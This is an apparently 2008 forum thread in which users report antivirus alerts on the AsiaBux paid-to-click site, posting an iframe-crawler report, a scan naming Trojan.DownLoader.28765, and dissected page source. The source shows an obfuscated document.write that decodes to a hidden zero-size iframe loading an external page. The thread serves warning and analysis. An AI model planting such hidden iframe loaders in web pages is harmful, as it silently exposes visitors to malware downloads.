Full Version: Asia Bux - Vastgate & Trojan Alert from my AV
longshanks1971
URL Checked: hxxp://www.AsiaBux.com/?r=netxxx

Got Vastgate and a trojan alert from my AV;

Zeroiframes detected: 8

Check took 31.66 seconds

(Level: 0) Url checked:
hxxp://www.asiabux.com/?r=net2dollar
Zeroiframes detected on this site: 0
Bidvertiser detected (TextAds, not a cheater)

(Level: 1) Url checked: (iframe source)
hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine=http://www.asiabux.com/?r=net2dollar

Blank page / could not connect

(Level: 2) Url checked: (script source)
hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=extra_info-optional

Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.vastgate.com/vastgate.php?z=1&pl=2952&rl=120
Zeroiframes detected on this site: 5
AdJungle code detected (Ads, not a cheater)


(Level: 2) Url checked: (iframe source)
hxxp://www.wakrah.net
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)

(Level: 3) Url checked: (iframe source)
hxxp://www.wakrah.net/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)

(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=634586&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010515
Blank page / could not connect

(Level: 2) Url checked: (iframe source)
hxxp://www.usersurf.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)
AdBrite detected (TextAds, not a cheater)

(Level: 3) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=469686&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010952
Blank page / could not connect

(Level: 3) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=469686&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.fastmega.com
Zeroiframes detected on this site: 2
AdJungle code detected (Ads, not a cheater)

(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/cpx_interactive.html
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (iframe source)
hxxp://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=468x60&section=254980
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 5) Url checked: (script source)
hxxp://adserving.cpxinteractive.com/+rm_url+
Blank page / could not connect

(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adthin.html
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (script source)
hxxp://www.adthin.com/show-ad.php?wid=1006&
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)

(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=467437&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/applyads.html
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (script source)
hxxp://applyads.com/pagead/show_ads.php?pubid=fastmegacom&group=468x60&channel=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)

(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=467437&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/prototype.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/common.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/progress.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/hint.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/swfobject_source.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/flashupload.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/overlay.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/clickedit.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://ads.clicksor.com/bannerad.php?pid=87645&sid=128404&adtype=2
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000009074
Blank page / could not connect

(Level: 2) Url checked: (iframe source)
hxxp://www.taswej.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)

(Level: 3) Url checked: (iframe source)
hxxp://www.taswej.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)

(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=636373&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010522
Blank page / could not connect

(Level: 2) Url checked: (iframe source)
hxxp://www.qatarzone.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)

(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000011256
Blank page / could not connect

(Level: 2) Url checked: (script source)
hxxp://adserve.adtoll.com/js/at_ag_1479.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000005294
Blank page / could not connect

(Level: 1) Url checked: (script source)
hxxp://bdv.bidvertiser.com/bidvertiser.dbm?pid=9009&bid=282454
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxxp://www.forced-layer.de/sc/lay.php?id=679&aid=977
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxxp://www.forced-layer.de/sc/layerhead.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxxp://www.forced-layer.de/sc/lb.php?id=679&aid=977&bid=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.forced-layer.de/sc/frame.php?id=679&kid=78&iid=248&aid=977
Zeroiframes detected on this site: 0
No ad codes identified
cconniejean
I've seen this before, trying to remember...




CODE
Checking: hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white
Engine version: 4.44.0.9170
File size: 1229 bytes

hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white - archive HTML
>hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white/Script.0 infected with Trojan.DownLoader.28765

Checking: hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL
File size: 2709 bytes

hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL - Ok

Checking: hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine=
File size: 0 bytes

hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine= - the size of the file is equal to zero, skipped
cconniejean
CODE
Query: http://www.hitsformoney.net/banniere.php?ref=paids&fond=white

Page Title:       No HTML title tags found
Server Response:     200 [ OK ]
Server Type:     Apache
Server IP:     213.186.33.2
IP PTR:     90plan.ovh.net
Last Dissected:       14/07/2008 23:31:31

<html><head></head><body><!-- Euro-clic.com --><script language="JavaScript" src="http://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL"></script><!-- Euro-clic.com --><a href=http://www.hitsformoney.net/index.php?page=inscription&parrain=paids target=_blank><img src='http://www.hitsformoney.net/images/banner.jpg' marginwidth='0' marginheight='0' frameborder='0' width='468' height='60' border=-1></a>

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061
Not posting all of the javascript, but it decodes to:

<script type="text/javascript">document.write('<iframe src="http://perso.orange.fr/lightningbolttraffic/sites/aut" width=0 height=0 frameborder=0></iframe>')</script>

<iframe src='http://www.hitsformoney.net/ban.php?pseudo=paids&origine=' MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER='0' width='0' height='0' SCROLLING='no'></iframe>
kaikka
lol
longshanks1971
QUOTE (kaikka @ Jul 31 2008, 10:46 AM)
lol


lol = Laugh out loud. Are you implying that it is somehow a laughing matter when there is stuff like this for the unsuspecting member/visitor to land on?